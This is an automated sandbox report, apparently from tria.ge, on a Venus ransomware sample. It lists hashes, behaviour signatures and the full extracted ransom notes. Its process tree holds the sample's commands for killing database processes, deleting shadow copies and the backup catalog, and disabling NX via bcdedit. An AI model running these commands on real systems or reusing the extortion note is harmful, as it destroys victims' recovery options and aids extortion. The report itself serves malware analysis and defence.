Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    66s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18/10/2022, 13:52

General

  • Target

    0a4e5832841ffff9f8d27ce8216d655c8743b682fff0f90dee6bd3ea83dec028.exe

  • Size

    225KB

  • MD5

    eae3f9f84a8b6756db599963aa4f49d1

  • SHA1

    c40909226c102ceb3cf97e9037c590f1623af013

  • SHA256

    0a4e5832841ffff9f8d27ce8216d655c8743b682fff0f90dee6bd3ea83dec028

  • SHA512

    dddcee2f12c1a0d8f0dd9a95e4b8f0841519361880d280beab3befd4afcebdecc9b8a32b1aedb9b9f542a22f6dc7c00af3afff93a0dc588f80d6a292a5a96602

  • SSDEEP

    6144:pROGJmXiQwAP5GXJHcTV50DErd5xgTw7ozFz254W:pROYeiQwAIHLD6GcoxfW

Malware Config

Extracted

Path

C:\README.html

Ransom Note
<html><head><title>Venus</title><style type = "text/css">*{padding:0;margin:0}p{color:white}.f{background-color:#ff7c00;width:100%;margin-left:auto;margin-right:auto;height:100%}.c h1{color:white;line-height:80px}.r{word-break:break-all;float:left;width:100%;text-align:center}</style></head><body><div class="f"><div class="c"><h1 align="center">&lt;&lt;&lt;Venus&gt;&gt;&gt;</h1></div><div class="r"><p></br></br></br></br><strong>We downloaded and encrypted your data.</strong></br>Only we can decrypt your data.<br><strong>IMPORTANT!</strong><br> If you, your programmers or your friends would try to help you to decrypt the files it can cause data loss even after you pay.<br> In this case we will not be able to help you.<br>Do not play with files.</p><p>Do not rename encrypted files.<br>Do not try to decrypt your data using third party software, it may cause permanent data loss.<br>Decryption of your files with the help of third parties may cause increased price or you can become a victim of a scam.</br>-----------------------------------------------------</br>Contact and send this file to us:<br><strong><br>email:[email protected]<br>tox:9DA3D60F51FB83B539BA0CC79B6D4BE83003F8E7A294B531B6EA05102486855ADEEFFF5A90C8<br>jabber:[email protected]</strong><br><br>VuXokCcRnGJ2yw1dZ6DSt2jUohdnWW8KeowQwBbwdk7wARjPe+d30uevttyHMflR cX9/hcqhmWo/pHxNWKV+d8L8knMWRqxHVV6fs7GhER9U7hUlT2z1gKh9G2XVCCwR 1jPkAGWhsMBySLy+O9iVwwFipgVOnbcXsa/yzQixONEkJtoHVkotigpAW7zTR7ez Ejsw7SmtkSVWf8s77lUtqn0D8PKHIaUWmBSSJ+bxYuXJeqT5LI2eiDDOOM+fS+FQ kfbddqrAIJrRXWqI8AjEjEvrQgkE33LR2XPwlffyMNufN1sTJ4YX0kF+0evJKTdW 8LIiKKcCHBvnQm2npEyZqmElCZSrBsacGVlc8HVK2qvuOqd1H2YM/f5nKam77uQK Ch8/DJAsFdWAMQJjPaD4Nuukk9HwynamHd/+wQSRou4698HrDtxR/894LzhtB3bW lSwk5/l7fnAqx5eQheyzbdWblVeFZUL5SX6nrAgbzLPSp1rz/cwfWGVMn280YeIX U5Z7ntHPXBoCPUSD1M9lFuLmRNTGNvY9jpslx/7iF/Nj3p06P2/hXh6GEkPirUTt eSJSHB7FZ4O6POr7E2jVqTo/aYkVpqh95U6XOE1nROEDkNECxFv2t14oBXQUoppv ZeXXPSKZPjEIo0+Q </p></div></body></html></html></body></html>
Emails

us:<br><strong><br>email:[email protected]<br>tox:9DA3D60F51FB83B539BA0CC79B6D4BE83003F8E7A294B531B6EA05102486855ADEEFFF5A90C8<br>jabber:[email protected]</strong><br><br>VuXokCcRnGJ2yw1dZ6DSt2jUohdnWW8KeowQwBbwdk7wARjPe+d30uevttyHMflR

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\5415296051972527219.hta

Ransom Note
<<<Venus>>> We downloaded and encrypted your data.Only we can decrypt your data.IMPORTANT! If you, your programmers or your friends would try to help you to decrypt the files it can cause data loss even after you pay. In this case we will not be able to help you. Do not play with files. Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. Decryption of your files with the help of third parties may cause increased price or you can become a victim of a scam.-----------------------------------------------------Contact and send this file to us: email:[email protected] tox:9DA3D60F51FB83B539BA0CC79B6D4BE83003F8E7A294B531B6EA05102486855ADEEFFF5A90C8 jabber:[email protected]
Emails

email:[email protected]

jabber:[email protected]

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 14 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops desktop.ini file(s) 34 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 53 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0a4e5832841ffff9f8d27ce8216d655c8743b682fff0f90dee6bd3ea83dec028.exe
    "C:\Users\Admin\AppData\Local\Temp\0a4e5832841ffff9f8d27ce8216d655c8743b682fff0f90dee6bd3ea83dec028.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4704
    • C:\Windows\0a4e5832841ffff9f8d27ce8216d655c8743b682fff0f90dee6bd3ea83dec028.exe
      "C:\Windows\0a4e5832841ffff9f8d27ce8216d655c8743b682fff0f90dee6bd3ea83dec028.exe" g g g o n e123
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Checks computer location settings
      • Drops desktop.ini file(s)
      • Enumerates connected drives
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3404
      • C:\Windows\System32\cmd.exe
        /C taskkill /F /IM msftesql.exe /IM sqlagent.exe /IM sqlbrowser.exe /IM sqlservr.exe /IM sqlwriter.exe /IM oracle.exe /IM ocssd.exe /IM dbsnmp.exe /IM synctime.exe /IM mydesktopqos.exe /IM agntsvc.exe /IM isqlplussvc.exe /IM xfssvccon.exe /IM mydesktopservice.exe /IM ocautoupds.exe /IM agntsvc.exe /IM agntsvc.exe /IM agntsvc.exe /IM encsvc.exe /IM firefoxconfig.exe /IM tbirdconfig.exe /IM ocomm.exe /IM mysqld.exe /IM mysqld-nt.exe /IM mysqld-opt.exe /IM dbeng50.exe /IM sqbcoreservice.exe /IM excel.exe /IM infopath.exe /IM msaccess.exe /IM mspub.exe /IM onenote.exe /IM outlook.exe /IM powerpnt.exe /IM sqlservr.exe /IM thebat64.exe /IM thunderbird.exe /IM winword.exe /IM wordpad.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5060
        • C:\Windows\system32\taskkill.exe
          taskkill /F /IM msftesql.exe /IM sqlagent.exe /IM sqlbrowser.exe /IM sqlservr.exe /IM sqlwriter.exe /IM oracle.exe /IM ocssd.exe /IM dbsnmp.exe /IM synctime.exe /IM mydesktopqos.exe /IM agntsvc.exe /IM isqlplussvc.exe /IM xfssvccon.exe /IM mydesktopservice.exe /IM ocautoupds.exe /IM agntsvc.exe /IM agntsvc.exe /IM agntsvc.exe /IM encsvc.exe /IM firefoxconfig.exe /IM tbirdconfig.exe /IM ocomm.exe /IM mysqld.exe /IM mysqld-nt.exe /IM mysqld-opt.exe /IM dbeng50.exe /IM sqbcoreservice.exe /IM excel.exe /IM infopath.exe /IM msaccess.exe /IM mspub.exe /IM onenote.exe /IM outlook.exe /IM powerpnt.exe /IM sqlservr.exe /IM thebat64.exe /IM thunderbird.exe /IM winword.exe /IM wordpad.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1688
      • C:\Windows\System32\cmd.exe
        /C wbadmin delete catalog -quiet && vssadmin.exe delete shadows /all /quiet && bcdedit.exe /set {current} nx AlwaysOff && wmic SHADOWCOPY DELETE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5912
        • C:\Windows\system32\wbadmin.exe
          wbadmin delete catalog -quiet
          4⤵
          • Deletes backup catalog
          PID:5964
        • C:\Windows\system32\vssadmin.exe
          vssadmin.exe delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:5836
        • C:\Windows\system32\bcdedit.exe
          bcdedit.exe /set {current} nx AlwaysOff
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:6384
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic SHADOWCOPY DELETE
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:6408
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\5415296051972527219.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
          PID:6136
      • C:\Windows\System32\cmd.exe
        /c ping localhost -n 3 > nul & del C:\Users\Admin\AppData\Local\Temp\0a4e5832841ffff9f8d27ce8216d655c8743b682fff0f90dee6bd3ea83dec028.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2616
        • C:\Windows\system32\PING.EXE
          ping localhost -n 3
          3⤵
          • Runs ping.exe
          PID:5068
    • C:\Windows\system32\wbengine.exe
      "C:\Windows\system32\wbengine.exe"
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:6000
    • C:\Windows\System32\vdsldr.exe
      C:\Windows\System32\vdsldr.exe -Embedding
      1⤵
        PID:6108
      • C:\Windows\System32\vds.exe
        C:\Windows\System32\vds.exe
        1⤵
        • Checks SCSI registry key(s)
        PID:1140
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4060

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\5415296051972527219.hta

        Filesize

        1KB

        MD5

        5615aecd8f5c11fecc543deb66384921

        SHA1

        f4811e649046ad83a01ea3ba6552364cc2f8d72d

        SHA256

        77bd29533dca8a9406dae258a34f8ab934578757ba6f06e13b49c71396a6291b

        SHA512

        7ea9902fae33c73e5bc720d9fc8b58202283d2a17349b0a434cd3fb9da703a0e31fcdb023775d41505465c712a173e06068a7666f2d3777e2cd83f630da8d941

      • C:\Windows\0a4e5832841ffff9f8d27ce8216d655c8743b682fff0f90dee6bd3ea83dec028.exe

        Filesize

        225KB

        MD5

        eae3f9f84a8b6756db599963aa4f49d1

        SHA1

        c40909226c102ceb3cf97e9037c590f1623af013

        SHA256

        0a4e5832841ffff9f8d27ce8216d655c8743b682fff0f90dee6bd3ea83dec028

        SHA512

        dddcee2f12c1a0d8f0dd9a95e4b8f0841519361880d280beab3befd4afcebdecc9b8a32b1aedb9b9f542a22f6dc7c00af3afff93a0dc588f80d6a292a5a96602

      • C:\Windows\0a4e5832841ffff9f8d27ce8216d655c8743b682fff0f90dee6bd3ea83dec028.exe

        Filesize

        225KB

        MD5

        eae3f9f84a8b6756db599963aa4f49d1

        SHA1

        c40909226c102ceb3cf97e9037c590f1623af013

        SHA256

        0a4e5832841ffff9f8d27ce8216d655c8743b682fff0f90dee6bd3ea83dec028

        SHA512

        dddcee2f12c1a0d8f0dd9a95e4b8f0841519361880d280beab3befd4afcebdecc9b8a32b1aedb9b9f542a22f6dc7c00af3afff93a0dc588f80d6a292a5a96602

      • memory/3404-140-0x0000000000400000-0x000000000043E000-memory.dmp

        Filesize

        248KB

      • memory/3404-141-0x0000000000400000-0x000000000043E000-memory.dmp

        Filesize

        248KB

      • memory/4704-132-0x0000000000400000-0x000000000043E000-memory.dmp

        Filesize

        248KB